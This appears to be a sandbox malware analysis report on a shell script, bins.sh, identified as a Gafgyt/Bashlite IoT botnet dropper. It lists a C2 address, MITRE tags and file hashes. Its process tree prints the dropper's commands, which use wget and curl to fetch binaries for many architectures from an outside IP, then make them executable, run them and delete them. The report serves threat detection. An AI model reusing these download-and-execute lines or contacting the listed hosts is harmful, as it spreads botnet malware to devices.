Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

10

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    48s
  • max time network
    129s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240508-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    03-02-2025 08:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    1KB

  • MD5

    202fafde5b2c6cd0b2548109a608c775

  • SHA1

    8872cccf4cfe65381ec53cebf811e1b8e7d11cd5

  • SHA256

    4968ba801674176e9d07c54ed20f199c123ece3c0c4082ee35a3ff4d7ee00471

  • SHA512

    3c3f2e2d23ce7e19840c7bfb03d1f105d226cda0e59eee1fd8350f1b91002ac785d79a168acb22e3bd99ef180ae0f6e79905804a120dd7b078601e5d24656413

Score
10/10
gafgytbotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

gafgyt

C2

185.237.15.131:666

Signatures

  • Detected Gafgyt variant 12 IoCs
  • Gafgyt family
    gafgyt
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

    botnetgafgyt
  • File and Directory Permissions Modification 1 TTPs 13 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 13 IoCs
  • System Network Configuration Discovery 1 TTPs 8 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    PID:1505
    • /usr/bin/wget
      wget http://103.130.214.198/jackmymips
      2⤵
      • System Network Configuration Discovery
      PID:1506
    • /usr/bin/curl
      curl -O http://103.130.214.198/jackmymips
      2⤵
      • System Network Configuration Discovery
      PID:1510
    • /bin/chmod
      chmod +x jackmymips
      2⤵
      • File and Directory Permissions Modification
      PID:1511
    • /run/jackmymips
      ./jackmymips
      2⤵
      • System Network Configuration Discovery
      PID:1512
    • /bin/rm
      rm -rf jackmymips
      2⤵
      • System Network Configuration Discovery
      PID:1513
    • /usr/bin/wget
      wget http://103.130.214.198/jackmymipsel
      2⤵
      • System Network Configuration Discovery
      PID:1514
    • /usr/bin/curl
      curl -O http://103.130.214.198/jackmymipsel
      2⤵
      • System Network Configuration Discovery
      PID:1515
    • /bin/chmod
      chmod +x jackmymipsel
      2⤵
      • File and Directory Permissions Modification
      PID:1516
    • /run/jackmymipsel
      ./jackmymipsel
      2⤵
      • System Network Configuration Discovery
      PID:1517
    • /bin/rm
      rm -rf jackmymipsel
      2⤵
      • System Network Configuration Discovery
      PID:1518
    • /usr/bin/wget
      wget http://103.130.214.198/jackmysh4
      2⤵
        PID:1519
      • /usr/bin/curl
        curl -O http://103.130.214.198/jackmysh4
        2⤵
          PID:1520
        • /bin/chmod
          chmod +x jackmysh4
          2⤵
          • File and Directory Permissions Modification
          PID:1521
        • /run/jackmysh4
          ./jackmysh4
          2⤵
            PID:1522
          • /bin/rm
            rm -rf jackmysh4
            2⤵
              PID:1523
            • /usr/bin/wget
              wget http://103.130.214.198/jackmyx86
              2⤵
                PID:1524
              • /usr/bin/curl
                curl -O http://103.130.214.198/jackmyx86
                2⤵
                  PID:1525
                • /bin/chmod
                  chmod +x jackmyx86
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1526
                • /run/jackmyx86
                  ./jackmyx86
                  2⤵
                    PID:1527
                  • /bin/rm
                    rm -rf jackmyx86
                    2⤵
                      PID:1528
                    • /usr/bin/wget
                      wget http://103.130.214.198/jackmyarmv6
                      2⤵
                        PID:1529
                      • /usr/bin/curl
                        curl -O http://103.130.214.198/jackmyarmv6
                        2⤵
                          PID:1530
                        • /bin/chmod
                          chmod +x jackmyarmv6
                          2⤵
                          • File and Directory Permissions Modification
                          PID:1531
                        • /run/jackmyarmv6
                          ./jackmyarmv6
                          2⤵
                            PID:1532
                          • /bin/rm
                            rm -rf jackmyarmv6
                            2⤵
                              PID:1533
                            • /usr/bin/wget
                              wget http://103.130.214.198/jackmyi686
                              2⤵
                                PID:1534
                              • /usr/bin/curl
                                curl -O http://103.130.214.198/jackmyi686
                                2⤵
                                  PID:1535
                                • /bin/chmod
                                  chmod +x jackmyi686
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:1536
                                • /run/jackmyi686
                                  ./jackmyi686
                                  2⤵
                                    PID:1537
                                  • /bin/rm
                                    rm -rf jackmyi686
                                    2⤵
                                      PID:1538
                                    • /usr/bin/wget
                                      wget http://103.130.214.198/jackmypowerpc
                                      2⤵
                                        PID:1539
                                      • /usr/bin/curl
                                        curl -O http://103.130.214.198/jackmypowerpc
                                        2⤵
                                          PID:1540
                                        • /bin/chmod
                                          chmod +x jackmypowerpc
                                          2⤵
                                          • File and Directory Permissions Modification
                                          PID:1543
                                        • /run/jackmypowerpc
                                          ./jackmypowerpc
                                          2⤵
                                            PID:1544
                                          • /bin/rm
                                            rm -rf jackmypowerpc
                                            2⤵
                                              PID:1545
                                            • /usr/bin/wget
                                              wget http://103.130.214.198/jackmyi586
                                              2⤵
                                                PID:1546
                                              • /usr/bin/curl
                                                curl -O http://103.130.214.198/jackmyi586
                                                2⤵
                                                  PID:1547
                                                • /bin/chmod
                                                  chmod +x jackmyi586
                                                  2⤵
                                                  • File and Directory Permissions Modification
                                                  PID:1548
                                                • /run/jackmyi586
                                                  ./jackmyi586
                                                  2⤵
                                                    PID:1549
                                                  • /bin/rm
                                                    rm -rf jackmyi586
                                                    2⤵
                                                      PID:1550
                                                    • /usr/bin/wget
                                                      wget http://103.130.214.198/jackmym86k
                                                      2⤵
                                                        PID:1551
                                                      • /usr/bin/curl
                                                        curl -O http://103.130.214.198/jackmym86k
                                                        2⤵
                                                          PID:1552
                                                        • /bin/chmod
                                                          chmod +x jackmym86k
                                                          2⤵
                                                          • File and Directory Permissions Modification
                                                          PID:1553
                                                        • /run/jackmym86k
                                                          ./jackmym86k
                                                          2⤵
                                                            PID:1554
                                                          • /bin/rm
                                                            rm -rf jackmym86k
                                                            2⤵
                                                              PID:1555
                                                            • /usr/bin/wget
                                                              wget http://103.130.214.198/jackmysparc
                                                              2⤵
                                                                PID:1556
                                                              • /usr/bin/curl
                                                                curl -O http://103.130.214.198/jackmysparc
                                                                2⤵
                                                                  PID:1557
                                                                • /bin/chmod
                                                                  chmod +x jackmysparc
                                                                  2⤵
                                                                  • File and Directory Permissions Modification
                                                                  PID:1558
                                                                • /run/jackmysparc
                                                                  ./jackmysparc
                                                                  2⤵
                                                                    PID:1559
                                                                  • /bin/rm
                                                                    rm -rf jackmysparc
                                                                    2⤵
                                                                      PID:1560
                                                                    • /usr/bin/wget
                                                                      wget http://103.130.214.198/jackmyarmv4
                                                                      2⤵
                                                                        PID:1561
                                                                      • /usr/bin/curl
                                                                        curl -O http://103.130.214.198/jackmyarmv4
                                                                        2⤵
                                                                          PID:1562
                                                                        • /bin/chmod
                                                                          chmod +x jackmyarmv4
                                                                          2⤵
                                                                          • File and Directory Permissions Modification
                                                                          PID:1563
                                                                        • /run/jackmyarmv4
                                                                          ./jackmyarmv4
                                                                          2⤵
                                                                            PID:1564
                                                                          • /bin/rm
                                                                            rm -rf jackmyarmv4
                                                                            2⤵
                                                                              PID:1565
                                                                            • /usr/bin/wget
                                                                              wget http://103.130.214.198/jackmyarmv5
                                                                              2⤵
                                                                                PID:1566
                                                                              • /usr/bin/curl
                                                                                curl -O http://103.130.214.198/jackmyarmv5
                                                                                2⤵
                                                                                  PID:1567
                                                                                • /bin/chmod
                                                                                  chmod +x jackmyarmv5
                                                                                  2⤵
                                                                                  • File and Directory Permissions Modification
                                                                                  PID:1568
                                                                                • /run/jackmyarmv5
                                                                                  ./jackmyarmv5
                                                                                  2⤵
                                                                                    PID:1569
                                                                                  • /bin/rm
                                                                                    rm -rf jackmyarmv5
                                                                                    2⤵
                                                                                      PID:1570
                                                                                    • /usr/bin/wget
                                                                                      wget http://103.130.214.198/jackmypowerpc440
                                                                                      2⤵
                                                                                        PID:1571
                                                                                      • /usr/bin/curl
                                                                                        curl -O http://103.130.214.198/jackmypowerpc440
                                                                                        2⤵
                                                                                          PID:1572
                                                                                        • /bin/chmod
                                                                                          chmod +x jackmypowerpc440
                                                                                          2⤵
                                                                                          • File and Directory Permissions Modification
                                                                                          PID:1573
                                                                                        • /run/jackmypowerpc440
                                                                                          ./jackmypowerpc440
                                                                                          2⤵
                                                                                            PID:1574
                                                                                          • /bin/rm
                                                                                            rm -rf jackmypowerpc440
                                                                                            2⤵
                                                                                              PID:1575

                                                                                          Network

                                                                                          MITRE ATT&CK Enterprise v15

                                                                                          Replay Monitor

                                                                                          Loading Replay Monitor...

                                                                                          Downloads

                                                                                          • /run/jackmyarmv4
                                                                                            Filesize

                                                                                            121KB

                                                                                            MD5

                                                                                            0a405ebd5dbfda473cb4ea67fb11022e

                                                                                            SHA1

                                                                                            63aa1adc69cfa659eaef618a13b237a5ba99c676

                                                                                            SHA256

                                                                                            25be6a0e7a281425036ca5e32f41044d267f9ce9e7734199e07d47d35ff71329

                                                                                            SHA512

                                                                                            cf715da52e6c708d305b45074816759654380d16ae9fd4256fb7922b5a1eeec3b9c02207b93bcf86be484d4392538f1cb27600da376da04751ad6b237d3d7956

                                                                                            Download Submit

                                                                                          • /run/jackmyarmv5
                                                                                            Filesize

                                                                                            114KB

                                                                                            MD5

                                                                                            16c719f948532703e99acccf76d2faa3

                                                                                            SHA1

                                                                                            b44cd1659fce47ccc079c07f9b034ef482985ffe

                                                                                            SHA256

                                                                                            ce5da3d0daaa7d8f9ec0ea62ead3fb5a110ec1a6a58cd4229c653883c4d81a84

                                                                                            SHA512

                                                                                            a34f80b6dac32d05a36ddaf7664275d72f1875f658cf05c524583265aea4e25fdf34fdd3c6b3b0a92bc07ed4421b985a0309cafcd2fee07dae570c752fdbc98f

                                                                                            Download Submit

                                                                                          • /run/jackmyarmv6
                                                                                            Filesize

                                                                                            135KB

                                                                                            MD5

                                                                                            5e4a03f668b36cf458db8120f5fd61a2

                                                                                            SHA1

                                                                                            3c832a0bc244fbf28b7972025c1cc3a6e20e96a1

                                                                                            SHA256

                                                                                            a79e47302aaceccefa752bc0311c60faf0585c9b27e14c8d8c927d476faee724

                                                                                            SHA512

                                                                                            98cf5a25c3422e6bfd7371805f2167ec1da9c4d69ef13d5825bade1142e087f34aed3e73d11904b99334a7d816e56d7a390db316b12e42bddee90dcd2b0a77a8

                                                                                            Download Submit

                                                                                          • /run/jackmyi586
                                                                                            Filesize

                                                                                            93KB

                                                                                            MD5

                                                                                            2eead00e32c17e8a8b42ae0bd5657b96

                                                                                            SHA1

                                                                                            f2fd0a91faf84ad1a1667d37203d08d30f68a52c

                                                                                            SHA256

                                                                                            e4268bb0b926afb0def833f91ca73145fd6465f38b64215277b9a473c7902c33

                                                                                            SHA512

                                                                                            f6d2be735f54fae4c99e1f3fbc2eaa9a632dfc1e162cf84cb539fab68a0858d40b4dc3f8cf0b9609d5af3ad6f3a8e8f8353ec2184770ecefc974069d7e7dc35e

                                                                                            Download Submit

                                                                                          • /run/jackmyi686
                                                                                            Filesize

                                                                                            93KB

                                                                                            MD5

                                                                                            608f6186183cc60ee980a3c61ed75657

                                                                                            SHA1

                                                                                            11ff1ae027e903b8346dc96ee3efe89b51a8a870

                                                                                            SHA256

                                                                                            4e2dc2ac640b9a450cabc34f024b66dd02c28ba4ff7553e92e2da05542c9334f

                                                                                            SHA512

                                                                                            5be2f66fe54bd27cd37256b28fc6a9906c4c30c87ecb766a4dc3de0c5a0b0d328879541328b623a094e744a28d167e2bceeafade98cbc7bf4ef26ded06da8217

                                                                                            Download Submit

                                                                                          • /run/jackmym86k
                                                                                            Filesize

                                                                                            111KB

                                                                                            MD5

                                                                                            8c4076716dc9b9d376b81ee1f9553882

                                                                                            SHA1

                                                                                            b192fac381d8f5883934217e51b04c71a7bb5b6b

                                                                                            SHA256

                                                                                            89df86cca67c48fc5a983b1fd52ce51220b43abbd9eec78ae1a72eebd6cf8995

                                                                                            SHA512

                                                                                            42fc2233dcdbd2ffbce29e81cc8319d3bdcd659eef73f0c3f47937954a7fa55c3477955fb817004cda3376586e151c9fddd14d13543929cd806bc74823652d18

                                                                                            Download Submit

                                                                                          • /run/jackmymips
                                                                                            Filesize

                                                                                            141KB

                                                                                            MD5

                                                                                            f07907753da39138058eefc527185ac0

                                                                                            SHA1

                                                                                            bf6af9d8c1fbff0f48e73427f887194a02aac844

                                                                                            SHA256

                                                                                            b0ec23f3a680be657e03be5bf279c1f99f12ee356f05bbefd2b562cb92c78d3a

                                                                                            SHA512

                                                                                            224149662ee0dfcc0a008436812479f643f7f10bba3d44be7619a7cf33810327e0ec763ada8a4f3647a575ea962789fc0ec1ee13d48d07e08054abad4930d657

                                                                                            Download Submit

                                                                                          • /run/jackmymipsel
                                                                                            Filesize

                                                                                            141KB

                                                                                            MD5

                                                                                            a66621dce8bb5463b936b6650d52f918

                                                                                            SHA1

                                                                                            24a1a2af65d9e4b453439e013d360059f21c555a

                                                                                            SHA256

                                                                                            6e3f0a5bd00e6e610efdb0a784354141b44be5055733c68fd6a036f689f9ab03

                                                                                            SHA512

                                                                                            5b4ae51f4d7e7494c97286bf762deb60a088ad72ea6d5c55f11715e22124e08ba285f13d5156ecc32cf3547913ddee1cd6336265a352ff3174bd7edb96640c9e

                                                                                            Download Submit

                                                                                          • /run/jackmypowerpc
                                                                                            Filesize

                                                                                            106KB

                                                                                            MD5

                                                                                            e02d5792cbcfba013b77203f049e8d48

                                                                                            SHA1

                                                                                            0659308f6099fcca6d5ac0783f976989f3c0464f

                                                                                            SHA256

                                                                                            47761f435515620e8296b30add528960578ab073a0f52cf1021c9901ceb97d09

                                                                                            SHA512

                                                                                            9d57d98bd0b3f8ada78cd684720b0902cead9fc7f1677f9ec2351362f0387fcfdd06b8f0e13a053684c5324912b946df4d4dd807d4d92130d7ee1d68729ab066

                                                                                            Download Submit

                                                                                          • /run/jackmypowerpc440
                                                                                            Filesize

                                                                                            277B

                                                                                            MD5

                                                                                            b7c50906aa8e85fda2d066ef8233139f

                                                                                            SHA1

                                                                                            078fb1bb7f7406e6f2155269d3efd7c1639b8364

                                                                                            SHA256

                                                                                            1e663810ae33c04c25c7bf335c8790cdc6175f73eb69d45e88fd5e0fb8393ced

                                                                                            SHA512

                                                                                            5078f5f4c2276c998de41ce4a018511e35d2201ed4c12aa95157b2d36463b4ecad8be5a51a73e68ac157dfdeb67dadcd15db82c51ac9b9e1af3ed29bd2443a10

                                                                                            Download Submit

                                                                                          • /run/jackmysh4
                                                                                            Filesize

                                                                                            102KB

                                                                                            MD5

                                                                                            6f1ea26027b8cd717ebb66dbef209df1

                                                                                            SHA1

                                                                                            1129623c2228408347c84b117db72fe08e0fe551

                                                                                            SHA256

                                                                                            e28b719b64201c9235e2640bd877d86884c1b6e031a9dc536bcb977ba82a61e7

                                                                                            SHA512

                                                                                            be9d639b58cdf72e081cd001c81b718c22d9af482258c2bef75fd7562d4256dc1fb15466b725ba5f37ef19cdf3d00dd4ebf5e46915249b5e2cbbd90c4aca1dc2

                                                                                            Download Submit

                                                                                          • /run/jackmysparc
                                                                                            Filesize

                                                                                            119KB

                                                                                            MD5

                                                                                            6288cc9f37ea265a1598737fda5ccc1a

                                                                                            SHA1

                                                                                            7b811ae42216a24eda07dc6f448329519823427b

                                                                                            SHA256

                                                                                            8549c5ef4adf358f75339db4241d2a20a3782d21fcc4e2f6a7d06b8d8e886196

                                                                                            SHA512

                                                                                            feaa5b1ccc2d4e8f408011a01095d7f9b759ef6a92950e9fcfd8fd89d28aac98b870b0c9950e649e491a6f1e97483fce5945fab4efceebae4cfb2965216c49b1

                                                                                            Download Submit

                                                                                          • /run/jackmyx86
                                                                                            Filesize

                                                                                            114KB

                                                                                            MD5

                                                                                            3653915d5fde38c3a942c8f7f2ee3db7

                                                                                            SHA1

                                                                                            ed26dc0db47db555fd502c252c795e23421e3e6e

                                                                                            SHA256

                                                                                            df374e54f910df6ee0a31fe202876fb2eaec5f8e752eb4e2d067f2ea188a56b8

                                                                                            SHA512

                                                                                            d4349385c308773c64042ef265a470bdb8272da2ab3b19036acc63a064e9bf22915975d2016a59b1d4c46ae4152f8864d3153f041e9e96cb4b122ca9f3f18cc3

                                                                                            Download Submit